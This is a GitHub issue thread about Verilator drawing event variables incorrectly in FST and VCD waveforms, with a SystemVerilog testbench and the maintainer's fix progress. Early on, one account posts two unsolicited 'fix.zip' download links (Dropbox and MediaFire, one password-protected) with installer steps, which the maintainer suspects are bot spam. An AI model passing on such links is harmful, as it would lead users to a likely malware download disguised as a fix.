verilator/verilator #5405: Waveform of the event variable

katsui97, 2024-08-26:
When displaying a variable defined with event in GTKWave, the waveform appears incorrectly.
In the case of:
event Ev_Test;

The timing when using ->Ev_Test; correctly releases the wait with @(Ev_Test).
Is the incorrect waveform due to design intent?
Best regards.

Verilator 5.029 devel rev v5.028-10-ga9635aaa2

Diganta-18, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Diganta-18, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

wsnyder, 2024-08-26:
That you added then removed a download link makes me suspect this is a bot, please confirm you are human by pasting a screen shot here of the waveform in the viewer.

katsui97, 2024-08-26:
The waveform has been pasted.

[image]

wsnyder, 2024-08-26:
Thanks, the waveform does show the event, so I'm not understanding the issue, can you explain more what's incorrect?

katsui97, 2024-08-26:
The waveform for the Event should only show a rising edge at the moment when the ->Ev_test is triggered. However, why is it appearing periodically? In commercial simulators like VCS and Xcelium, the rising edge only occurs at the intended timing.

wsnyder, 2024-08-26:
Ah.  Can you post the example in text form please?

katsui97, 2024-08-26:
Thank you for your prompt response. I'll send the RTL (testbench) shortly.

Also, while I'm at it, I wanted to mention that the clocking block is being correctly executed in the Reactive region, but it seems that the program instance is not executing in the Reactive region (it behaves the same as a normal module instance).
[test.txt](https://github.com/user-attachments/files/16746785/test.txt)
[counter.txt](https://github.com/user-attachments/files/16746786/counter.txt)

katsui97, 2024-08-27:
The latest master branch has been checked, but the issue still hasn't been resolved.

wsnyder, 2024-08-30:
Thanks for the test. Note this only affects FST not VCD.

Attempted fix in #5424 but core dumps on some multithread tests so needs work.

katsui97, 2024-08-31:
Oh, I was able to confirm that the VCD is displayed correctly with the latest master. Indeed, it hasn’t changed in FST yet. Thank you for your continued consideration.

katsui97, 2024-08-31:
Oh! With the latest master, I was able to correctly verify the event waveforms in VCD. I remember that previously it was a bit different from FST, and VCD seemed to have issues as well, so it looks like that has been fixed. I also confirmed that FST still hasn't been fixed. I appreciate your continued efforts on this.

katsui97, 2024-08-31:
Huh, perhaps VCD was displaying the event variables correctly in the waveform for regular module instances. I was testing it simultaneously with program instances, and I might have confused it with the abnormal waveforms from that test.

I checked with the current latest master, and the event variable waveforms are still incorrect in VCD when using program instances. I briefly pointed out the issue where changes are not reflected in the Reactive region with program instances, but it seems that the waveform display in VCD is also incorrect for program instances.

I have attached the test bench and waveforms for your review. Please take a look.
------------------------------------------------------------
[image]
------------------------------------------------------------
`timescale 1ns/100ps

module top();

  // VCD or FST Dump
  initial begin
    $dumpfile("wave.dump");
    $dumpvars(0, top);
  end

  bit CLK;

  // Gen Clock
  initial
    forever
    begin
      CLK = ~CLK;
      #10;
    end

  clocking cb @(posedge CLK);
  endclocking

  event Ev_test;

  bit RST_X = 1'b1;

  logic [3:0] r_cnt;
  always_ff @(posedge CLK, negedge RST_X)
    if(~RST_X)
      r_cnt <= '0;
    else
      r_cnt <= 4'(r_cnt + 1'b1);

  initial
  begin
    #12
    RST_X = 1'b0;   
    #15
    RST_X = 1'b1;

    #20;

    forever
    begin
      if(r_cnt == 5)
      begin
        ->Ev_test;
        break;
      end
      @(cb);
      //@(posedge CLK);
    end

    repeat(20)
      @(posedge CLK);

    #10;

    $finish;
  end

  bit det_flag = 1'b0;

  initial
  begin
    forever
    begin
      @(Ev_test);
      det_flag = 1'b1;
    end
  end

  // program instance
  test_prg test_prg(.CLK);

endmodule

program test_prg(
  input logic CLK
);

  event Ev_test_prg;
  bit det_flag_prg = 1'b0;

  initial
  begin
    forever
    begin
      @(posedge CLK);
      if(top.r_cnt == 5)
      begin
        ->Ev_test_prg;
        det_flag_prg = 1'b1;
        break;
      end
    end

    forever
      @(posedge CLK);
  end

endprogram

katsui97, 2024-09-04:
For waveform output in VCD format, I confirmed that the abnormal periodic event waveforms have been eliminated even for program instances. However, for waveform output in FST format, it appears that there has been no improvement for both module and program instances. Is my understanding correct?

-------------------------------------------------------------
SHA-1: e4ff0909dc84f9ba3c565c396a46534f1f1cb7db
* Tests: Misc test cleanups from Python branch.

wsnyder, 2024-09-04:
@katsui97 the changes haven't been merged to master as they do not test correctly in multithreaded, they are on that pull request.

closed 2024-09-10 by wsnyder

katsui97, 2024-09-11:
I have confirmed that the extra periodic events have been eliminated when outputting waveforms in FST mode. Thank you for your support.